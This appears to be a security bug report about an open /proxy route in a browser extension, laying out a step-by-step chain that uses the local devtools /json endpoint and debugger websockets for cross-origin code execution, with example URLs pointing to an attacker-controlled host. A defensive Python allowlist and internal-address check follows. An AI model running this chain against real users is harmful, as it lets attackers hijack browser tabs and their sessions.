Description
As reported by Adam Baldwin from andyet over email
Getting access to devtools
I'm curious to know what the /proxy route is actually used for on the mod_strip extension? It allows for some interesting things. Specifically, one can use that route to load a page controlled by an attacker and execute code.

Further, that code could attempt to locate the port the devtools are running on and find the various endpoints for the open tabs at the /json endpoint.

Normally this would be blocked by same origin policy, but because of the proxy route it's possible to get those endpoints. Having the content of that json file means a debugger websocket connection can be made to each of those tabs and code executed in the context of those tabs, which gives XSS on a variety of origins.

It would be pretty messy to exploit, but here is how I would go about it.
- Make requests to the following url to find the local port that allows proxy.
  127.0.0.1:PORT/proxy?url=http://evilpacket.net
- Make requests to the following url to find the dev tools port that will give me the json endpoints. When it hits the right one it will notify the external service and we can correlate the 2 events.
  http://127.0.0.1:PORT/devtools/devtools.html?ws=evilpacket.net
- Redirect user to the following url so that we can use same origin policy to get the json in the next step.
  127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://evilpacket.net/payload
- Get the JSON via a request to
  127.0.0.1:PORT_FROM_STEP_1/proxy?url=http://127.0.0.1:PORT_FROM_STEP_2/json
- Parse the JSON for ws URLs.
- Make web socket connections to each of those and do whatever with the content on the tabs, etc., acting as the devtools debugger over that ws channel.
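The root cause in the report is an open /proxy route: it fetches whatever `url=` names, including the loopback devtools /json endpoint, and hands the result back from the extension's own origin. A defender's check for that class of bug is shown below as an added example; it is not code from the mod_strip project or from the reporter's email. The function name, the allowlist and the resolver stub in the test are assumptions: a proxy handler would call `proxy_target_allowed` before issuing any request, allow only explicitly listed hosts, and refuse any destination whose resolved address is loopback, private, link-local or otherwise non-public, which is what blocks the `http://127.0.0.1:PORT/json` hop used in step 4.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Only plain web schemes are ever proxied (no file:, ws:, gopher:, ...).
ALLOWED_SCHEMES = {"http", "https"}


def _is_internal(ip_text: str) -> bool:
    """True for loopback (127.0.0.1, ::1), RFC1918/ULA, link-local and other
    non-public addresses that a proxy must never reach on the user's behalf."""
    addr = ipaddress.ip_address(ip_text)
    return (
        addr.is_loopback
        or addr.is_private
        or addr.is_link_local
        or addr.is_reserved
        or addr.is_multicast
        or addr.is_unspecified
    )


def proxy_target_allowed(url, allowed_hosts, resolve=socket.gethostbyname):
    """Decide whether a /proxy?url=... destination may be fetched.

    Returns (ok, detail). `allowed_hosts` is a set of lowercase hostnames the
    operator has explicitly approved (an assumption of this example). `resolve`
    maps a hostname to an IP string; the default uses DNS, tests inject a stub.
    The check is allowlist first, then the resolved address, so a listed host
    that happens to resolve to 127.0.0.1 is still refused.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable url"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return False, "no host in url"
    if parts.username or parts.password:
        # user:pass@host tricks are a classic way to confuse host parsing.
        return False, "credentials in url"
    if host.lower() not in allowed_hosts:
        return False, f"host not allowlisted: {host!r}"
    try:
        ip_text = resolve(host)
    except OSError:
        return False, f"could not resolve {host!r}"
    if _is_internal(ip_text):
        return False, f"{host!r} resolves to internal address {ip_text}"
    return True, ip_text


if __name__ == "__main__":
    # Constructed sample inputs; the resolver stub keeps this offline.
    allow = {"example.org"}
    for candidate in (
        "http://127.0.0.1:9222/json",          # the devtools hop from the report
        "http://example.org/page",             # an allowlisted public host
        "file:///etc/hosts",                   # wrong scheme
    ):
        print(candidate, proxy_target_allowed(candidate, allow, resolve=lambda h: "93.184.216.34"))
```

Two points worth keeping in mind when applying this: the allowlist alone is not enough, because a listed name can be pointed at 127.0.0.1 through DNS, so the resolved address is checked as well; and even with a sound destination check, proxied content should not be delivered from the same origin that hosts devtools or any privileged page, otherwise step 3 of the report (attacker HTML running in the local origin) still works for whatever hosts remain allowed.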